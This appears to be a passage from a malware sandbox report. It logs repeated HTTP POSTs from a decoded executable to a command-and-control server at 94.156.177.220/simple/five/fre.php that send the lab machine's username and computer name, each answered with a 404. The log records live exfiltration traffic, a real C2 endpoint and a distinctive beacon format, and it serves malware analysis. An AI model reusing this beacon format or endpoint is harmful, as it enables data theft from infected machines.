                                  Oct 25, 2024 10:21:34.472930908 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:34 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  74192.168.2.45000594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:34.644509077 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:34.650471926 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:35.623763084 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:35 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  75192.168.2.45001494.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:35.776802063 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:35.782291889 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:36.765660048 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:36 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  76192.168.2.45002194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:36.916836023 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:36.922599077 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:37.889924049 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:37 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  77192.168.2.45002794.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:38.065571070 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:38.071599007 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:39.040096045 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:38 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  78192.168.2.45003394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:39.199455023 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:39.204843044 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:40.344208956 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:40 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  79192.168.2.45003994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:40.493951082 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:40.499809980 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:41.490698099 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:41 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  80192.168.2.45005094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:41.648252010 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:41.653913975 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:42.628232956 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:42 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  81192.168.2.45005694.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:42.769633055 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:42.775265932 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:43.771524906 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:43 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  82192.168.2.45006294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:43.932138920 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:43.937768936 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:44.921889067 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:44 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  83192.168.2.45007394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:45.071362972 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:45.077227116 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:46.047409058 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:45 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  84192.168.2.45007894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:46.196688890 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:46.202322960 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:47.209161997 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:47 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  85192.168.2.45008594.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:47.371918917 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:47.377458096 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:48.343065023 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:48 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  86192.168.2.45008894.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:48.496957064 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:48.502507925 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:49.488792896 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:49 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  87192.168.2.45008994.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:49.654278040 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:49.659828901 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:50.626844883 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:50 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  88192.168.2.45009094.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:51.492516994 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:51.498323917 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:52.356110096 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:52 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  89192.168.2.45009194.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:52.512600899 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:52.518212080 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:53.474535942 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:53 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  90192.168.2.45009294.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:53.643651009 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:53.649173021 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:54.627542973 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:54 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  91192.168.2.45009394.156.177.220807468C:\Users\user\Desktop\1729844285df3beefdd998d9488ed81285c601b4206d2d286448af87fbe46e5e262d812b0f698.dat-decoded.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 25, 2024 10:21:54.804053068 CEST246OUTPOST /simple/five/fre.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: 94.156.177.220
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 508F6F5C
                                  Content-Length: 149
                                  Connection: close
                                  Oct 25, 2024 10:21:54.809439898 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 35 00 35 00 34 00 33 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                  Data Ascii: (ckav.rujones965543JONES-PC0FDD42EE188E931437F4FBE2C
                                  Oct 25, 2024 10:21:55.754867077 CEST236INHTTP/1.1 404 Not Found
                                  Server: nginx/1.26.1
                                  Date: Fri, 25 Oct 2024 08:21:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Content-Length: 23
                                  Connection: close
                                  X-Powered-By: PHP/5.4.16
                                  Status: 404 Not Found
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
